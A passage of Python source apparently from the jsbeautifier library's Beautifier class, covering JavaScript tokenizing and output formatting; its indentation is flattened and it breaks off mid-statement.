def __init__(self, opts = default_options() ):
self.opts = opts
self.blank_state()
self.acorn = Acorn();
def blank_state(self):
# internal flags
self.flags = None
self.previous_flags = None
self.flag_store = []
self.input_wanted_newline = False
if self.opts.indent_with_tabs:
self.opts.indent_char = "\t"
self.opts.indent_size = 1
self.indent_string = self.opts.indent_char * self.opts.indent_size
self.preindent_string = ''
self.last_type = 'TK_START_BLOCK' # last token type
self.last_last_text = '' # pre-last token text
self.input = None
self.output_lines = [ OutputLine() ]
self.output_space_before_token = False
self.whitespace_before_token = []
self.whitespace = ["\n", "\r", "\t", " "]
self.wordchar = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$'
self.digits = '0123456789'
self.punct = '+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! ~ , : ? ^ ^= |= :: =>'
self.punct += ' <?= <? ?> <%= <% %>'
self.punct = self.punct.split(' ')
# Words which always should start on a new line
self.line_starters = 'continue,try,throw,return,var,let,const,if,switch,case,default,for,while,break,function,yield'.split(',')
self.reserved_words = self.line_starters + ['do', 'in', 'else', 'get', 'set', 'new', 'catch', 'finally', 'typeof'];
self.set_mode(MODE.BlockStatement)
self.parser_pos = 0
def beautify(self, s, opts = None ):
if opts != None:
self.opts = opts
if self.opts.brace_style not in ['expand', 'collapse', 'end-expand']:
raise(Exception('opts.brace_style must be "expand", "collapse" or "end-expand".'))
self.blank_state()
while s and s[0] in [' ', '\t']:
self.preindent_string += s[0]
s = s[1:]
self.input = self.unpack(s, self.opts.eval_code)
self.parser_pos = 0
handlers = {
'TK_START_EXPR': self.handle_start_expr,
'TK_END_EXPR': self.handle_end_expr,
'TK_START_BLOCK': self.handle_start_block,
'TK_END_BLOCK': self.handle_end_block,
'TK_WORD': self.handle_word,
'TK_RESERVED': self.handle_word,
'TK_SEMICOLON': self.handle_semicolon,
'TK_STRING': self.handle_string,
'TK_EQUALS': self.handle_equals,
'TK_OPERATOR': self.handle_operator,
'TK_COMMA': self.handle_comma,
'TK_BLOCK_COMMENT': self.handle_block_comment,
'TK_INLINE_COMMENT': self.handle_inline_comment,
'TK_COMMENT': self.handle_comment,
'TK_DOT': self.handle_dot,
'TK_UNKNOWN': self.handle_unknown,
}
while True:
self.token_text, self.token_type = self.get_next_token()
#print (token_text, self.token_type, self.flags.mode)
if self.token_type == 'TK_EOF':
while self.flags.mode == MODE.Statement:
self.restore_mode();
break
keep_whitespace = self.opts.keep_array_indentation and self.is_array(self.flags.mode)
self.input_wanted_newline = self.n_newlines > 0
if keep_whitespace:
for i in range(self.n_newlines):
self.append_newline(i > 0)
else: # not keep_whitespace
if self.opts.max_preserve_newlines != 0 and self.n_newlines > self.opts.max_preserve_newlines:
self.n_newlines = self.opts.max_preserve_newlines
if self.opts.preserve_newlines and self.n_newlines > 1:
for i in range(self.n_newlines):
self.append_newline(i != 0)
handlers[self.token_type](self.token_text)
# The cleanest handling of inline comments is to treat them as though they aren't there.
# Just continue formatting and the behavior should be logical.
if self.token_type != 'TK_INLINE_COMMENT' and self.token_type != 'TK_COMMENT' and self.token_type != 'TK_BLOCK_COMMENT' and self.token_type != 'TK_UNKNOWN':
self.last_last_text = self.flags.last_text
self.last_type = self.token_type
self.flags.last_text = self.token_text
self.flags.had_comment = self.token_type in ['TK_COMMENT', 'TK_INLINE_COMMENT', 'TK_BLOCK_COMMENT']
sweet_code = ''.join(self.output_lines[0].text)
if len(self.output_lines) > 1:
for line_index in range(1, len(self.output_lines)):
sweet_code += '\n' + ''.join(self.output_lines[line_index].text);
sweet_code = re.sub('[\n ]+$', '', sweet_code)
return sweet_code
def unpack(self, source, evalcode=False):
import jsbeautifier.unpackers as unpackers
try:
return unpackers.run(source, evalcode)
except unpackers.UnpackingError as error:
print('error:', error)
return ''
def trim_output(self, eat_newlines = False):
self.trim_output_line(self.output_lines[-1])
while eat_newlines and len(self.output_lines) > 1 and \
len(self.output_lines[-1].text) == 0:
self.output_lines.pop()
self.trim_output_line(self.output_lines[-1])
def trim_output_line(self, line):
while len(line.text) \
and (
line.text[-1] == ' '\
or line.text[-1] == self.indent_string \
or line.text[-1] == self.preindent_string):
line.text.pop()
def is_special_word(self, s):
return s in ['case', 'return', 'do', 'if', 'throw', 'else']
def is_array(self, mode):
return mode == MODE.ArrayLiteral
def is_expression(self, mode):
return mode in [MODE.Expression, MODE.ForInitializer, MODE.Conditional]
def just_added_newline(self):
line = self.output_lines[-1]
return len(line.text) == 0
def just_added_blankline(self):
if self.just_added_newline():
if len(self.output_lines) == 1:
return True
line = self.output_lines[-2]
return len(line.text) == 0
return False
def allow_wrap_or_preserved_newline(self, token_text, force_linewrap = False):
if self.opts.wrap_line_length > 0 and not force_linewrap:
line = self.output_lines[-1]
# never wrap the first token of a line.
if len(line.text) > 0:
proposed_line_length = len(''.join(line.text)) + len(token_text)
if self.output_space_before_token:
proposed_line_length += 1
if proposed_line_length >= self.opts.wrap_line_length:
force_linewrap = True
if ((self.opts.preserve_newlines and self.input_wanted_newline) or force_linewrap) and not self.just_added_newline():
self.append_newline(preserve_statement_flags = True)
def append_newline(self, force_newline = False, preserve_statement_flags = False):
self.output_space_before_token = False
if not preserve_statement_flags:
if self.flags.last_text != ';' and self.flags.last_text != ',' and self.flags.last_text != '=' and self.last_type != 'TK_OPERATOR':
while self.flags.mode == MODE.Statement and not self.flags.if_block and not self.flags.do_block:
self.restore_mode();
if len(self.output_lines) == 1 and self.just_added_newline():
# no newline on start of file
return
if force_newline or not self.just_added_newline():
self.flags.multiline_frame = True
self.output_lines.append(OutputLine())
def append_token_line_indentation(self):
if self.just_added_newline():
line = self.output_lines[-1]
if self.opts.keep_array_indentation and self.is_array(self.flags.mode) and self.input_wanted_newline:
# prevent removing of this whitespace as redundant
line.text.append('');
for item in self.whitespace_before_token:
line.text.append(item)
else:
if self.preindent_string != '':
line.text.append(self.preindent_string)
level = self.flags.indentation_level;
self.append_indent_string(level)
def append_indent_string(self, level):
# Never indent your first output indent at the start of the file
if len(self.output_lines) > 1:
line = self.output_lines[-1]
self.flags.line_indent_level = level
for i in range(level):
line.text.append(self.indent_string)
def append_token_space_before(self):
# make sure only single space gets drawn
line = self.output_lines[-1]
if self.output_space_before_token and len(line.text) and line.text[-1] not in [' ', self.indent_string]:
line.text.append(' ')
def append_token(self, s):
self.append_token_line_indentation()
self.append_token_space_before()
self.output_space_before_token = False
self.output_lines[-1].text.append(s)
def indent(self):
self.flags.indentation_level += 1
def deindent(self):
allow_deindent = self.flags.indentation_level > 0 and ((self.flags.parent == None) or self.flags.indentation_level > self.flags.parent.indentation_level)
if allow_deindent:
self.flags.indentation_level -= 1
def remove_redundant_indentation(self, frame):
# This implementation is effective but has some issues:
# - less than great performance due to array splicing
# - can cause line wrap to happen too soon due to indent removal
# after wrap points are calculated
# These issues are minor compared to ugly indentation.
if frame.multiline_frame:
return
# remove one indent from each line inside this section
index = frame.start_line_index
splice_index = 0
while index < len(self.output_lines):
line = self.output_lines[index]
index += 1
# skip empty lines
if len(line.text) == 0:
continue
# skip the preindent string if present
if self.preindent_string != '' and \
line.text[0] == self.preindent_string:
splice_index = 1
else:
splice_index = 0
# remove one indent, if present
if line.text[splice_index] == self.indent_string:
del line.text[splice_index]
def set_mode(self, mode):
if self.flags:
self.flag_store.append(self.flags)
self.previous_flags = self.flags
else:
self.previous_flags = BeautifierFlags(mode)
self.flags = BeautifierFlags(mode)
self.flags.apply_base(self.previous_flags, self.just_added_newline());
self.flags.start_line_index = len(self.output_lines)
def restore_mode(self):
if len(self.flag_store) > 0:
self.previous_flags = self.flags
self.flags = self.flag_store.pop()
if self.previous_flags.mode == MODE.Statement:
self.remove_redundant_indentation(self.previous_flags)
def start_of_object_property(self):
return self.flags.parent.mode == MODE.ObjectLiteral and self.flags.mode == MODE.Statement and self.flags.last_text == ':' and \
self.flags.ternary_depth == 0
def start_of_statement(self):
if (
(self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and self.token_type == 'TK_WORD') \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'do') \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'return' and not self.input_wanted_newline) \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text == 'else' and not (self.token_type == 'TK_RESERVED' and self.token_text == 'if' )) \
or (self.last_type == 'TK_END_EXPR' and (self.previous_flags.mode == MODE.ForInitializer or self.previous_flags.mode == MODE.Conditional)) \
or (self.last_type == 'TK_WORD' and self.flags.mode == MODE.BlockStatement \
and not self.flags.in_case
and not (self.token_text == '--' or self.token_text == '++')
and self.token_type != 'TK_WORD' and self.token_type != 'TK_RESERVED') \
or (self.flags.mode == MODE.ObjectLiteral and self.flags.last_text == ':' and self.flags.ternary_depth == 0) \
):
self.set_mode(MODE.Statement);
self.indent();
if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and self.token_type == 'TK_WORD':
self.flags.declaration_statement = True
# Issue #276:
# If starting a new statement with [if, for, while, do], push to a new line.
# if (a) if (b) if(c) d(); else e(); else f();
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(self.token_text, self.token_type == 'TK_RESERVED' and self.token_text in ['do', 'for', 'if', 'while']);
return True
else:
return False
def is_next(self, find):
local_pos = self.parser_pos
if local_pos >= len(self.input):
return False
c = self.input[local_pos]
while (c in self.whitespace) and c != find:
local_pos+= 1
if local_pos >= len(self.input):
return False
c = self.input[local_pos]
return c == find
def get_next_token(self):
self.n_newlines = 0
if self.parser_pos >= len(self.input):
return '', 'TK_EOF'
self.input_wanted_newline = False
self.whitespace_before_token = []
c = self.input[self.parser_pos]
self.parser_pos += 1
while c in self.whitespace:
if c == '\n':
self.n_newlines += 1
self.whitespace_before_token = []
elif c == self.indent_string:
self.whitespace_before_token.append(self.indent_string)
elif c != '\r':
self.whitespace_before_token.append(' ')
if self.parser_pos >= len(self.input):
return '', 'TK_EOF'
c = self.input[self.parser_pos]
self.parser_pos += 1
# NOTE: because beautifier doesn't fully parse, it doesn't use acorn.isIdentifierStart.
# It just treats all identifiers and numbers and such the same.
if self.acorn.isIdentifierChar(ord(self.input[self.parser_pos-1])):
if self.parser_pos < len(self.input):
while self.acorn.isIdentifierChar(ord(self.input[self.parser_pos])):
c = c + self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos == len(self.input):
break
# small and surprisingly unugly hack for IE-10 representation
if self.parser_pos != len(self.input) and self.input[self.parser_pos] in '+-' \
and re.match('^[0-9]+[Ee]$', c):
sign = self.input[self.parser_pos]
self.parser_pos += 1
t = self.get_next_token()
c += sign + t[0]
return c, 'TK_WORD'
if not (self.last_type == 'TK_DOT' \
or (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['set', 'get'])) \
and c in self.reserved_words:
if c == 'in': # in is an operator, need to hack
return c, 'TK_OPERATOR'
return c, 'TK_RESERVED'
return c, 'TK_WORD'
if c in '([':
return c, 'TK_START_EXPR'
if c in ')]':
return c, 'TK_END_EXPR'
if c == '{':
return c, 'TK_START_BLOCK'
if c == '}':
return c, 'TK_END_BLOCK'
if c == ';':
return c, 'TK_SEMICOLON'
if c == '/':
comment = ''
inline_comment = True
if self.input[self.parser_pos] == '*': # peek /* .. */ comment
self.parser_pos += 1
if self.parser_pos < len(self.input):
while not (self.input[self.parser_pos] == '*' and \
self.parser_pos + 1 < len(self.input) and \
self.input[self.parser_pos + 1] == '/')\
and self.parser_pos < len(self.input):
c = self.input[self.parser_pos]
comment += c
if c in '\r\n':
inline_comment = False
self.parser_pos += 1
if self.parser_pos >= len(self.input):
break
self.parser_pos += 2
if inline_comment and self.n_newlines == 0:
return '/*' + comment + '*/', 'TK_INLINE_COMMENT'
else:
return '/*' + comment + '*/', 'TK_BLOCK_COMMENT'
if self.input[self.parser_pos] == '/': # peek // comment
comment = c
while self.input[self.parser_pos] not in '\r\n':
comment += self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos >= len(self.input):
break
return comment, 'TK_COMMENT'
if c == '`' or c == "'" or c == '"' or \
( \
(c == '/') or \
(self.opts.e4x and c == "<" and re.match('^<(!\[CDATA\[[\s\S]*?\]\]|[-a-zA-Z:0-9_.]+|\{[^{}]*\})\s*([-a-zA-Z:0-9_.]+=(\{[^{}]*\}|"[^"]*"|\'[^\']*\')\s*)*\/?\s*>', self.input[self.parser_pos - 1:])) \
) and ( \
(self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text)) or \
(self.last_type == 'TK_END_EXPR' and self.previous_flags.mode in [MODE.Conditional, MODE.ForInitializer]) or \
(self.last_type in ['TK_COMMENT', 'TK_START_EXPR', 'TK_START_BLOCK', 'TK_END_BLOCK', 'TK_OPERATOR', \
'TK_EQUALS', 'TK_EOF', 'TK_SEMICOLON', 'TK_COMMA'])):
sep = c
esc = False
esc1 = 0
esc2 = 0
resulting_string = c
in_char_class = False
if self.parser_pos < len(self.input):
if sep == '/':
# handle regexp
in_char_class = False
while esc or in_char_class or self.input[self.parser_pos] != sep:
resulting_string += self.input[self.parser_pos]
if not esc:
esc = self.input[self.parser_pos] == '\\'
if self.input[self.parser_pos] == '[':
in_char_class = True
elif self.input[self.parser_pos] == ']':
in_char_class = False
else:
esc = False
self.parser_pos += 1
if self.parser_pos >= len(self.input):
# incomplete regex when end-of-file reached
                        # bail out with what has been received so far
return resulting_string, 'TK_STRING'
elif self.opts.e4x and sep == '<':
# handle e4x xml literals
xmlRegExp = re.compile('<(\/?)(!\[CDATA\[[\s\S]*?\]\]|[-a-zA-Z:0-9_.]+|\{[^{}]*\})\s*([-a-zA-Z:0-9_.]+=(\{[^{}]*\}|"[^"]*"|\'[^\']*\')\s*)*(\/?)\s*>')
xmlStr = self.input[self.parser_pos - 1:]
match = xmlRegExp.match(xmlStr)
if match:
rootTag = match.group(2)
depth = 0
while (match):
isEndTag = match.group(1)
tagName = match.group(2)
isSingletonTag = (match.groups()[-1] != "") or (match.group(2)[0:8] == "![CDATA[")
if tagName == rootTag and not isSingletonTag:
if isEndTag:
depth -= 1
else:
depth += 1
if depth <= 0:
break
match = xmlRegExp.search(xmlStr, match.end())
if match:
xmlLength = match.end() # + len(match.group())
else:
xmlLength = len(xmlStr)
self.parser_pos += xmlLength - 1
return xmlStr[:xmlLength], 'TK_STRING'
else:
# handle string
while esc or self.input[self.parser_pos] != sep:
resulting_string += self.input[self.parser_pos]
if esc1 and esc1 >= esc2:
try:
esc1 = int(resulting_string[-esc2:], 16)
except Exception:
esc1 = False
if esc1 and esc1 >= 0x20 and esc1 <= 0x7e:
esc1 = chr(esc1)
resulting_string = resulting_string[:-2 - esc2]
if esc1 == sep or esc1 == '\\':
resulting_string += '\\'
resulting_string += esc1
esc1 = 0
if esc1:
esc1 += 1
elif not esc:
esc = self.input[self.parser_pos] == '\\'
else:
esc = False
if self.opts.unescape_strings:
if self.input[self.parser_pos] == 'x':
esc1 += 1
esc2 = 2
elif self.input[self.parser_pos] == 'u':
esc1 += 1
esc2 = 4
self.parser_pos += 1
if self.parser_pos >= len(self.input):
# incomplete string when end-of-file reached
                            # bail out with what has been received so far
return resulting_string, 'TK_STRING'
self.parser_pos += 1
resulting_string += sep
if sep == '/':
# regexps may have modifiers /regexp/MOD, so fetch those too
while self.parser_pos < len(self.input) and self.input[self.parser_pos] in self.wordchar:
resulting_string += self.input[self.parser_pos]
self.parser_pos += 1
return resulting_string, 'TK_STRING'
if c == '#':
# she-bang
if len(self.output_lines) == 1 and len(self.output_lines[0].text) == 0 and \
len(self.input) > self.parser_pos and self.input[self.parser_pos] == '!':
resulting_string = c
while self.parser_pos < len(self.input) and c != '\n':
c = self.input[self.parser_pos]
resulting_string += c
self.parser_pos += 1
return resulting_string.strip() + '\n', 'TK_UNKNOWN'
# Spidermonkey-specific sharp variables for circular references
# https://developer.mozilla.org/En/Sharp_variables_in_JavaScript
# http://mxr.mozilla.org/mozilla-central/source/js/src/jsscan.cpp around line 1935
sharp = '#'
if self.parser_pos < len(self.input) and self.input[self.parser_pos] in self.digits:
while True:
c = self.input[self.parser_pos]
sharp += c
self.parser_pos += 1
if self.parser_pos >= len(self.input) or c == '#' or c == '=':
break
if c == '#' or self.parser_pos >= len(self.input):
pass
elif self.input[self.parser_pos] == '[' and self.input[self.parser_pos + 1] == ']':
sharp += '[]'
self.parser_pos += 2
elif self.input[self.parser_pos] == '{' and self.input[self.parser_pos + 1] == '}':
sharp += '{}'
self.parser_pos += 2
return sharp, 'TK_WORD'
if c == '<' and self.input[self.parser_pos - 1 : self.parser_pos + 3] == '<!--':
self.parser_pos += 3
c = '<!--'
while self.parser_pos < len(self.input) and self.input[self.parser_pos] != '\n':
c += self.input[self.parser_pos]
self.parser_pos += 1
self.flags.in_html_comment = True
return c, 'TK_COMMENT'
if c == '-' and self.flags.in_html_comment and self.input[self.parser_pos - 1 : self.parser_pos + 2] == '-->':
self.flags.in_html_comment = False
self.parser_pos += 2
return '-->', 'TK_COMMENT'
if c == '.':
return c, 'TK_DOT'
if c in self.punct:
while self.parser_pos < len(self.input) and c + self.input[self.parser_pos] in self.punct:
c += self.input[self.parser_pos]
self.parser_pos += 1
if self.parser_pos >= len(self.input):
break
if c == ',':
return c, 'TK_COMMA'
if c == '=':
return c, 'TK_EQUALS'
return c, 'TK_OPERATOR'
return c, 'TK_UNKNOWN'
def handle_start_expr(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
next_mode = MODE.Expression
if token_text == '[':
if self.last_type == 'TK_WORD' or self.flags.last_text == ')':
if self.last_type == 'TK_RESERVED' and self.flags.last_text in self.line_starters:
self.output_space_before_token = True
self.set_mode(next_mode)
self.append_token(token_text)
self.indent()
if self.opts.space_in_paren:
self.output_space_before_token = True
return
next_mode = MODE.ArrayLiteral
if self.is_array(self.flags.mode):
if self.flags.last_text == '[' or (
self.flags.last_text == ',' and (self.last_last_text == ']' or self.last_last_text == '}')):
# ], [ goes to a new line
# }, [ goes to a new line
if not self.opts.keep_array_indentation:
self.append_newline()
else:
if self.last_type == 'TK_RESERVED' and self.flags.last_text == 'for':
next_mode = MODE.ForInitializer
elif self.last_type == 'TK_RESERVED' and self.flags.last_text in ['if', 'while']:
next_mode = MODE.Conditional
else:
next_mode = MODE.Expression
if self.flags.last_text == ';' or self.last_type == 'TK_START_BLOCK':
self.append_newline()
elif self.last_type in ['TK_END_EXPR', 'TK_START_EXPR', 'TK_END_BLOCK'] or self.flags.last_text == '.':
# do nothing on (( and )( and ][ and ]( and .(
# TODO: Consider whether forcing this is required. Review failing tests when removed.
self.allow_wrap_or_preserved_newline(token_text, self.input_wanted_newline);
elif not (self.last_type == 'TK_RESERVED' and token_text == '(') and self.last_type not in ['TK_WORD', 'TK_OPERATOR']:
self.output_space_before_token = True
elif (self.last_type == 'TK_RESERVED' and (self.flags.last_word == 'function' or self.flags.last_word == 'typeof')) or \
(self.flags.last_text == '*' and self.last_last_text =='function'):
# function() vs function (), typeof() vs typeof ()
if self.opts.jslint_happy:
self.output_space_before_token = True
elif self.last_type == 'TK_RESERVED' and (self.flags.last_text in self.line_starters or self.flags.last_text == 'catch'):
# TODO: option space_before_conditional
self.output_space_before_token = True
# Support of this kind of newline preservation:
# a = (b &&
# (c || d));
if self.last_type in ['TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(token_text)
self.set_mode(next_mode)
self.append_token(token_text)
if self.opts.space_in_paren:
self.output_space_before_token = True
# In all cases, if we newline while inside an expression it should be indented.
self.indent()
def handle_end_expr(self, token_text):
# statements inside expressions are not valid syntax, but...
# statements must all be closed when their container closes
while self.flags.mode == MODE.Statement:
self.restore_mode()
if self.flags.multiline_frame:
self.allow_wrap_or_preserved_newline(self.token_text, self.token_text == ']' and self.is_array(self.flags.mode) and not self.opts.keep_array_indentation)
if self.opts.space_in_paren:
if self.last_type == 'TK_START_EXPR' and not self.opts.space_in_empty_paren:
# empty parens are always "()" and "[]", not "( )" or "[ ]"
self.output_space_before_token = False
self.trim_output()
else:
self.output_space_before_token = True
if self.token_text == ']' and self.opts.keep_array_indentation:
self.append_token(token_text)
self.restore_mode()
else:
self.restore_mode()
self.append_token(token_text)
self.remove_redundant_indentation(self.previous_flags);
# do {} while () // no statement required after
if self.flags.do_while and self.previous_flags.mode == MODE.Conditional:
self.previous_flags.mode = MODE.Expression
self.flags.do_block = False
self.flags.do_while = False
def handle_start_block(self, token_text):
self.set_mode(MODE.BlockStatement)
empty_braces = self.is_next('}')
empty_anonymous_function = empty_braces and self.flags.last_word == 'function' and \
self.last_type == 'TK_END_EXPR'
if self.opts.brace_style == 'expand':
if self.last_type != 'TK_OPERATOR' and \
(empty_anonymous_function or
self.last_type == 'TK_EQUALS' or
(self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text) and self.flags.last_text != 'else')):
self.output_space_before_token = True
else:
self.append_newline(preserve_statement_flags = True)
else: # collapse
if self.last_type not in ['TK_OPERATOR', 'TK_START_EXPR']:
if self.last_type == 'TK_START_BLOCK':
self.append_newline()
else:
self.output_space_before_token = True
else:
# if TK_OPERATOR or TK_START_EXPR
if self.is_array(self.previous_flags.mode) and self.flags.last_text == ',':
if self.last_last_text == '}':
self.output_space_before_token = True
else:
self.append_newline()
self.append_token(token_text)
self.indent()
def handle_end_block(self, token_text):
# statements must all be closed when their container closes
while self.flags.mode == MODE.Statement:
self.restore_mode()
empty_braces = self.last_type == 'TK_START_BLOCK';
if self.opts.brace_style == 'expand':
if not empty_braces:
self.append_newline()
else:
# skip {}
if not empty_braces:
if self.is_array(self.flags.mode) and self.opts.keep_array_indentation:
self.opts.keep_array_indentation = False
self.append_newline()
self.opts.keep_array_indentation = True
else:
self.append_newline()
self.restore_mode()
self.append_token(token_text)
def handle_word(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
elif self.input_wanted_newline and \
not self.is_expression(self.flags.mode) and \
(self.last_type != 'TK_OPERATOR' or (self.flags.last_text == '--' or self.flags.last_text == '++')) and \
self.last_type != 'TK_EQUALS' and \
(self.opts.preserve_newlines or not (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const', 'set', 'get'])):
self.append_newline()
if self.flags.do_block and not self.flags.do_while:
if self.token_type == 'TK_RESERVED' and token_text == 'while':
# do {} ## while ()
self.output_space_before_token = True
self.append_token(token_text)
self.output_space_before_token = True
self.flags.do_while = True
return
else:
# do {} should always have while as the next word.
# if we don't see the expected while, recover
self.append_newline()
self.flags.do_block = False
# if may be followed by else, or not
# Bare/inline ifs are tricky
# Need to unwind the modes correctly: if (a) if (b) c(); else d(); else e();
if self.flags.if_block:
if (not self.flags.else_block) and (self.token_type == 'TK_RESERVED' and token_text == 'else'):
self.flags.else_block = True
else:
while self.flags.mode == MODE.Statement:
self.restore_mode()
self.flags.if_block = False
if self.token_type == 'TK_RESERVED' and (token_text == 'case' or (token_text == 'default' and self.flags.in_case_statement)):
self.append_newline()
if self.flags.case_body or self.opts.jslint_happy:
self.flags.case_body = False
self.deindent()
self.append_token(token_text)
self.flags.in_case = True
self.flags.in_case_statement = True
return
if self.token_type == 'TK_RESERVED' and token_text == 'function':
if self.flags.last_text in ['}', ';'] or (self.just_added_newline() and not self.flags.last_text in ['{', ':', '=', ',']):
# make sure there is a nice clean space of at least one blank line
# before a new function definition, except in arrays
if not self.just_added_blankline() and not self.flags.had_comment:
self.append_newline()
self.append_newline(True)
if self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD':
if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set', 'new', 'return']:
self.output_space_before_token = True
else:
self.append_newline()
elif self.last_type == 'TK_OPERATOR' or self.flags.last_text == '=':
# foo = function
self.output_space_before_token = True
elif self.is_expression(self.flags.mode):
# (function
pass
else:
self.append_newline()
if self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(token_text)
if self.token_type == 'TK_RESERVED' and token_text == 'function':
self.append_token(token_text)
self.flags.last_word = token_text
return
prefix = 'NONE'
if self.last_type == 'TK_END_BLOCK':
if not (self.token_type == 'TK_RESERVED' and token_text in ['else', 'catch', 'finally']):
prefix = 'NEWLINE'
else:
if self.opts.brace_style in ['expand', 'end-expand']:
prefix = 'NEWLINE'
else:
prefix = 'SPACE'
self.output_space_before_token = True
elif self.last_type == 'TK_SEMICOLON' and self.flags.mode == MODE.BlockStatement:
# TODO: Should this be for STATEMENT as well?
prefix = 'NEWLINE'
elif self.last_type == 'TK_SEMICOLON' and self.is_expression(self.flags.mode):
prefix = 'SPACE'
elif self.last_type == 'TK_STRING':
prefix = 'NEWLINE'
elif self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD' or \
(self.flags.last_text == '*' and self.last_last_text == 'function'):
prefix = 'SPACE'
elif self.last_type == 'TK_START_BLOCK':
prefix = 'NEWLINE'
elif self.last_type == 'TK_END_EXPR':
self.output_space_before_token = True
prefix = 'NEWLINE'
if self.token_type == 'TK_RESERVED' and token_text in self.line_starters and self.flags.last_text != ')':
if self.flags.last_text == 'else':
prefix = 'SPACE'
else:
prefix = 'NEWLINE'
if self.token_type == 'TK_RESERVED' and token_text in ['else', 'catch', 'finally']:
if self.last_type != 'TK_END_BLOCK' \
or self.opts.brace_style == 'expand' \
or self.opts.brace_style == 'end-expand':
self.append_newline()
else:
self.trim_output(True)
line = self.output_lines[-1]
# If we trimmed and there's something other than a close block before us
# put a newline back in. Handles '} // comment' scenario.
if line.text[-1] != '}':
self.append_newline()
self.output_space_before_token = True
elif prefix == 'NEWLINE':
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
# no newline between return nnn
self.output_space_before_token = True
elif self.last_type != 'TK_END_EXPR':
if (self.last_type != 'TK_START_EXPR' or not (self.token_type == 'TK_RESERVED' and token_text in ['var', 'let', 'const'])) and self.flags.last_text != ':':
# no need to force newline on VAR -
# for (var x = 0...
if self.token_type == 'TK_RESERVED' and token_text == 'if' and self.flags.last_word == 'else' and self.flags.last_text != '{':
self.output_space_before_token = True
else:
self.append_newline()
elif self.token_type == 'TK_RESERVED' and token_text in self.line_starters and self.flags.last_text != ')':
self.append_newline()
elif self.is_array(self.flags.mode) and self.flags.last_text == ',' and self.last_last_text == '}':
self.append_newline() # }, in lists get a newline
elif prefix == 'SPACE':
self.output_space_before_token = True
self.append_token(token_text)
self.flags.last_word = token_text
if self.token_type == 'TK_RESERVED' and token_text == 'do':
self.flags.do_block = True
if self.token_type == 'TK_RESERVED' and token_text == 'if':
self.flags.if_block = True
def handle_semicolon(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
# Semicolon can be the start (and end) of a statement
self.output_space_before_token = False
while self.flags.mode == MODE.Statement and not self.flags.if_block and not self.flags.do_block:
self.restore_mode()
self.append_token(token_text)
if self.flags.mode == MODE.ObjectLiteral:
# OBJECT mode is weird and doesn't get reset too well.
self.flags.mode = MODE.BlockStatement
def handle_string(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
# One difference - strings want at least a space before
self.output_space_before_token = True
elif self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD':
self.output_space_before_token = True
elif self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
if not self.start_of_object_property():
self.allow_wrap_or_preserved_newline(token_text)
else:
self.append_newline()
self.append_token(token_text)
def handle_equals(self, token_text):
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
if self.flags.declaration_statement:
# just got an '=' in a var-line, different line breaking rules will apply
self.flags.declaration_assignment = True
self.output_space_before_token = True
self.append_token(token_text)
self.output_space_before_token = True
def handle_comma(self, token_text):
if self.flags.declaration_statement:
if self.is_expression(self.flags.parent.mode):
# do not break on comma, for ( var a = 1, b = 2
self.flags.declaration_assignment = False
self.append_token(token_text)
if self.flags.declaration_assignment:
self.flags.declaration_assignment = False
self.append_newline(preserve_statement_flags = True)
else:
self.output_space_before_token = True
return
self.append_token(token_text)
if self.flags.mode == MODE.ObjectLiteral \
or (self.flags.mode == MODE.Statement and self.flags.parent.mode == MODE.ObjectLiteral):
if self.flags.mode == MODE.Statement:
self.restore_mode()
self.append_newline()
else:
# EXPR or DO_BLOCK
self.output_space_before_token = True
def handle_operator(self, token_text):
# Check if this is a BlockStatement that should be treated as a ObjectLiteral
if self.token_text == ':' and self.flags.mode == MODE.BlockStatement and \
self.last_last_text == '{' and \
(self.last_type == 'TK_WORD' or self.last_type == 'TK_RESERVED'):
self.flags.mode = MODE.ObjectLiteral
if self.start_of_statement():
# The conditional starts the statement if appropriate.
pass
space_before = True
space_after = True
if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
# return had a special handling in TK_WORD
self.output_space_before_token = True
self.append_token(token_text)
return
# hack for actionscript's import .*;
if token_text == '*' and self.last_type == 'TK_DOT' and not self.last_last_text.isdigit():
self.append_token(token_text)
return
if token_text == ':' and self.flags.in_case:
self.flags.case_body = True
self.indent()
self.append_token(token_text)
self.append_newline()
self.flags.in_case = False
return
if token_text == '::':
# no spaces around the exotic namespacing syntax operator
self.append_token(token_text)
return
# http://www.ecma-international.org/ecma-262/5.1/#sec-7.9.1
# if there is a newline between -- or ++ and anything else we should preserve it.
if self.input_wanted_newline and (token_text == '--' or token_text == '++'):
self.append_newline()
# Allow line wrapping between operators in an expression
if self.last_type == 'TK_OPERATOR':
self.allow_wrap_or_preserved_newline(token_text)
if token_text in ['--', '++', '!', '~'] \
or (token_text in ['+', '-'] \
